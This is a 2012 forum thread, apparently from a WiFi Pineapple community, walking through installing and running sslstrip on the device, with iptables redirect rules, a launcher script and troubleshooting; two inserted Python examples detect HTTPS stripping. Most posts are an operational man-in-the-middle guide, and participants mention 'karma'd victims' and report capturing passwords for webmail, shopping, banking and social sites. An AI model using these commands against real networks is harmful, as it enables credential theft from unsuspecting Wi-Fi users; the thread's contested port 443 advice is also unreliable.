telot Posted June 17, 2012

Ok - there's never been a straight up "How to get sslstrip working" thread - there's quite a few bits and pieces and there's always WM's module... but people still seem to be confused. I aim to put a stop to this via this here guide.

1. Install sslstrip:

    opkg update
    opkg install --dest usb sslstrip

Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this:

    opkg install sslstrip

(herpaderp)

2. One time configuration of sslstrip: A HUGE thanks to Vulture for laying this out for us:

    ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7
    touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip.

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

4. Run sslstrip!

    sslstrip -w /usb/sslstrip.log &

Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet!

Hope you all enjoy

telot

shadowmmm Posted June 17, 2012

thank you telot

BigFanOHak5 Posted June 17, 2012 (edited June 17, 2012)

Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till I get my TTL cable to do a clean flash.

thaihenry Posted June 17, 2012

Hi Telot

Why would this be necessary? This is ssl traffic and can't be decrypted:

    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

Also I am having a problem with direction

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It seems that only the traffic from browsing the pineapple's interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated.

Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

> Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till i get my TTL cable to do a clean flash.

legion Posted June 18, 2012 (edited June 18, 2012)

> Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

lol... that's the point of sslstrip. It decrypts SSL and re-packages it. Here's more info on it: http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/

abxy007 Posted June 18, 2012

Nice

Vile Posted June 18, 2012

I get this when I try to run it:

    root@Pineapple:/www# sslstrip -w /usb/test
    Traceback (most recent call last):
      File "/usb/usr/bin/sslstrip", line 27, in <module>
        from twisted.web import http
      File "/usb/usr/lib/python2.7/site-packages/twisted/web/http.py", line 36, in <module>
        from twisted.internet import interfaces, reactor, protocol, address, task
      File "/usb/usr/lib/python2.7/site-packages/twisted/internet/reactor.py", line 11, in <module>
        from twisted.internet import selectreactor
      File "/usb/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 21, in <module>
        from twisted.internet import error
    EOFError: EOF read where object expected

Dies after that. Any ideas?

thaihenry Posted June 18, 2012

I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption. If you are going to quote a web page might as well be the author of the tool: Moxie Marlinspike http://www.thoughtcrime.org/software/sslstrip/

"How does this work? First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example). At this point, sslstrip receives the traffic and does its magic."

His site has clear details of how this works. There is no mention of redirecting traffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key.

From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. You can do the same thing with other transparent proxies.

> lol... that's the point of sslstrip. It decrypts SSL and re-packages it. Here's more info on it: http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/

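
The rewriting described in the post above (HTTPS links and redirects mapped to HTTP) can be spotted from the client side by comparing a response fetched over a trusted path with the same response as received on the network under test. This is an added example, not part of the thread or of sslstrip; the host name shop.example.test, the function names and the sample responses are constructed for illustration.

```python
import re

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+", re.IGNORECASE)

def parse_response(raw):
    """Split a raw HTTP response into (status, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def to_http(url):
    """Return the plain-HTTP form of an https:// URL."""
    return "http://" + url[len("https://"):]

def stripping_findings(trusted_raw, observed_raw):
    """List every HTTPS reference in the trusted copy that the observed
    copy carries only in its http:// form (hypothetical helper)."""
    _, t_headers, t_body = parse_response(trusted_raw)
    _, o_headers, o_body = parse_response(observed_raw)
    findings = []
    t_loc = t_headers.get("location", "")
    o_loc = o_headers.get("location", "")
    # A redirect to HTTPS that arrives as a redirect to HTTP.
    if t_loc.lower().startswith("https://") and o_loc == to_http(t_loc):
        findings.append(("redirect", t_loc))
    # Links and form targets in the body that lost their "s".
    for url in sorted(set(HTTPS_URL.findall(t_body))):
        if url not in o_body and to_http(url) in o_body:
            findings.append(("link", url))
    return findings

# Constructed sample responses (not captured traffic).
TRUSTED_REDIRECT = ("HTTP/1.1 301 Moved Permanently\r\n"
                    "Location: https://shop.example.test/\r\n\r\n")
OBSERVED_REDIRECT = TRUSTED_REDIRECT.replace("https://", "http://")
TRUSTED_PAGE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                '<a href="http://shop.example.test/help">Help</a>'
                '<form action="https://shop.example.test/login"></form>')
OBSERVED_PAGE = TRUSTED_PAGE.replace("https://", "http://")
```

An empty result for a page that normally links to HTTPS means the observed copy matches the trusted one; links that were already plain HTTP in the trusted copy are not reported.
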
telot (Author) Posted June 18, 2012

> Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 Also I am having a problem with direction iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated. Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.

telot

thaihenry Posted June 18, 2012

telot,

Thank you for your input. Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting.

I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far. I have had no problem in the past getting sslstrip to work on a regular computer. Just wondering if IP tables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703, a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router?

Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer?

> I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share. telot

Whistle Master Posted June 18, 2012

Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.

telot (Author) Posted June 19, 2012

> Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.

TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem.

I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so who's complaining? :)

telot

Whistle Master Posted June 19, 2012 (edited June 19, 2012)

> TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem.

I will add the port 443 in the next version, just in case :P

> I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :) telot

I will see how I can add the possibility to start modules from the Button module. :)

hexomega Posted June 22, 2012

> I will add the port 443 in the next version, just in case :P

This is a mistake. It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason. I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again.

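
The point made in the post above, shown on the bytes themselves: the first thing a client sends to port 443 is a TLS record, which an HTTP request parser cannot read, while port 80 traffic starts with a request line. This is an added example, not code from the thread or from sslstrip; the function names and both byte strings are constructed for illustration.

```python
import struct

HTTP_METHODS = (b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"CONNECT")

def parse_http_request_line(data):
    """Return (method, target, version), or None if data is not an HTTP request."""
    line, sep, _ = data.partition(b"\r\n")
    parts = line.split(b" ")
    if not sep or len(parts) != 3 or parts[0] not in HTTP_METHODS:
        return None
    if not parts[2].startswith(b"HTTP/"):
        return None
    return tuple(p.decode("ascii", "replace") for p in parts)

def parse_tls_record_header(data):
    """Return (content_type, (major, minor), length) for a TLS record, else None."""
    if len(data) < 5:
        return None
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    # 20-23 are the TLS record content types; 22 is "handshake".
    if ctype not in (20, 21, 22, 23) or major != 3:
        return None
    return ctype, (major, minor), length

def classify(data):
    """Label the first bytes of a TCP stream as seen by a listener."""
    if parse_http_request_line(data):
        return "http"
    rec = parse_tls_record_header(data)
    # Handshake record whose first message type is 1 (ClientHello).
    if rec and rec[0] == 22 and len(data) > 5 and data[5] == 1:
        return "tls-client-hello"
    return "tls-record" if rec else "unknown"

# Constructed samples: what a plaintext listener receives from each port.
PORT_80_BYTES = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
# Record header (handshake, TLS 1.0 record version, 47 bytes) followed by a
# ClientHello header and zero padding standing in for the rest of the message.
PORT_443_BYTES = b"\x16\x03\x01\x00\x2f" + b"\x01\x00\x00\x2b\x03\x03" + bytes(41)
```
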
BigFanOHak5 Posted July 5, 2012 (edited July 5, 2012)

> This is a mistake. It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason. I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again.

Followed your guide, but when I get to this step:

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It booted me from the webui and now when I try to get back to the webui, I get a problem loading page error. Thoughts?

Molotof Posted July 5, 2012

> Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts?

You could wait a little bit and you will gain access to the webui or you could go to the shell and type:

    iptables -t nat -D PREROUTING 1

... then you will get the webui back.

sickduck Posted July 18, 2012

Here is a script that will run the iptables command and launch sslstrip with the date and time as the logfile in /usb. It works when running it from an SSH terminal but for some reason it doesn't seem to work from the WPS button script.

    #!/bin/sh
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    _now=$(date +"%Y%m%d-%H%M%S")
    _file="/usb/sslstrip_$_now.log"
    sslstrip -w $_file

sickduck Posted July 19, 2012

What interface do you set tcpdump to monitor on?

7ncubane Posted August 9, 2012 (edited August 9, 2012)

My thoughts after trying different suggestions: I'm using MkIV with 2.5. Connected via ethernet to laptop running Backtrack5r2. Installed sslstrip via command line to usb. Tried running sslstrip via command line with different options. My results are:

1. Needed to edit /etc/sysctl.conf file as suggested in another post.
2. You need to forward both 80 and 443. Otherwise either http or https pages hang on loading while the other loads ok. Both seem to be needed for seamless browsing.
3. Fix port forwarding after done with sslstrip.
4. Had best results with running -k -p switches.

I'll post how it goes with relay configuration with Alfa card next.

7ncubane Posted August 9, 2012

Sorry for 2 postings in a row. I've been playing with sslstrip and noticed something. I was able to sniff my passwords on yahoo mail, gmail, amazon, capital one credit card, and twitter. However, when I tried Chase, Wells Fargo, and Charles Schwab, sign in pages would not even load. The browser just got "stuck". It seems that sslstrip passes through http traffic ok and processes regular https traffic ok, but seems to be not able to process certain https sites. Anybody have similar experience? Any idea what this "non-standard" https/ssl traffic might be?

sickduck Posted August 11, 2012

Some mobile apps (like Facebook for Android) will not work at all when sslstrip is running

carmichaeldylan Posted August 11, 2012

On iphone Facebook works but youtube, bank apps, and bank websites don't work. Also is there a way to run sslstrip with karma without the Pineapple restarting or am I the only one with that problem? lol

7ncubane Posted August 13, 2012

Thanks for input. I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple.

Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but urlsnarf needs packets directly from port 80. (I think.)

PineDominator Posted August 14, 2012

> thanks for input. I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple. Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but url snarf need packets directly from port 80. (I think.)

urlsnarf does not need iptables set up, it just listens on port 80

amoeba Posted August 18, 2012

Can't get it to work, redirecting both 443 and 80. Edited /etc/sysctl.conf. When I try to load an https site it just keeps loading for a while and I get error loading page. Anyone have a good working guide on this?